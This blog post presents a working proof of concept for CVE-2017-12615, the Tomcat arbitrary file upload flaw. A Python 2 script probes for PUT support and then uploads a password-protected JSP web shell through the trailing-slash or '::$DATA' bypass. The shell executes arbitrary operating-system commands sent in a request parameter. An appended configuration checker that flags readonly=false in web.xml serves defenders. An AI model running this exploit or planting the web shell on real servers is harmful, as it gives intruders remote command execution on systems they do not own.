[CVE-2017-12615] Tomcat Arbitrary File Upload Vulnerability PoC - 颓废's Blog

Preface:
A note on arbitrary file upload against Tomcat once the PUT method is enabled

Affected versions:

7.0.0 – 7.0.81

Precondition:

The readonly parameter has been added to conf/web.xml with its value set to false

#! -*- coding:utf-8 -*-
import httplib
import sys
import time

# JSP written to the server: executes the 'cmd' parameter when 'pwd' equals "023"
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
try:
    # Probe with OPTIONS first: the Allow header shows whether PUT is enabled at all
    conn = httplib.HTTPConnection(sys.argv[1])
    conn.request(method='OPTIONS', url='/ffffzz')
    headers = dict(conn.getresponse().getheaders())
    if 'allow' in headers and \
       headers['allow'].find('PUT') >= 0:
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        # The trailing '/' (or '::$DATA' on Windows) is the CVE-2017-12615 flaw:
        # the request bypasses the JSP servlet and the DefaultServlet writes the file
        url = "/" + str(int(time.time())) + '.jsp/'
        #url = "/" + str(int(time.time())) + '.jsp::$DATA'
        conn.request(method='PUT', url=url, body=body)
        res = conn.getresponse()
        if res.status == 201:
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
        elif res.status == 204:
            print 'file exists'
        else:
            print 'error'
        conn.close()
    else:
        print 'Server not vulnerable'

except Exception, e:
    print 'Error:', e
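The precondition above is a single init-param, so it can be audited directly from conf/web.xml before anything reaches the network. The checker below is an added example and is not part of the original post: it parses a constructed sample web.xml (not taken from a real install), locates the org.apache.catalina.servlets.DefaultServlet declaration and reports whether readonly is false; a missing parameter is treated as true, which is Tomcat's default.

```python
import xml.etree.ElementTree as ET

DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"

# Constructed sample conf/web.xml fragments (not from a real installation):
# the first carries the readonly=false init-param that the post names as the
# precondition for PUT uploads; the second is the same file with the safe value.
VULNERABLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

HARDENED_WEB_XML = VULNERABLE_WEB_XML.replace(
    "<param-value>false</param-value>", "<param-value>true</param-value>")


def _local(tag):
    """Strip the XML namespace so differently-namespaced web.xml files are handled alike."""
    return tag.rsplit("}", 1)[-1]


def default_servlet_readonly(web_xml_text):
    """Return the effective readonly setting of the DefaultServlet.

    True/False mirrors the declared init-param; a declared servlet without the
    param returns True (Tomcat default); None means the servlet is not declared.
    """
    root = ET.fromstring(web_xml_text)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        cls = next((c.text for c in servlet if _local(c.tag) == "servlet-class"), "")
        if (cls or "").strip() != DEFAULT_SERVLET:
            continue
        for param in servlet:
            if _local(param.tag) != "init-param":
                continue
            kv = {_local(c.tag): (c.text or "").strip() for c in param}
            if kv.get("param-name") == "readonly":
                return kv.get("param-value", "").lower() == "true"
        return True  # servlet declared, readonly absent: writes are refused
    return None


def allows_put(web_xml_text):
    """True only when the configuration lets the DefaultServlet accept PUT/DELETE."""
    return default_servlet_readonly(web_xml_text) is False


if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        print(name, "readonly =", default_servlet_readonly(text), "allows PUT:", allows_put(text))
```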

Copyright notice: unless otherwise noted, this article is an original work by 颓废; please keep the source link when reposting.

Permalink: [CVE-2017-12615] Tomcat Arbitrary File Upload Vulnerability PoC - https://www.0dayhack.com/post-761.html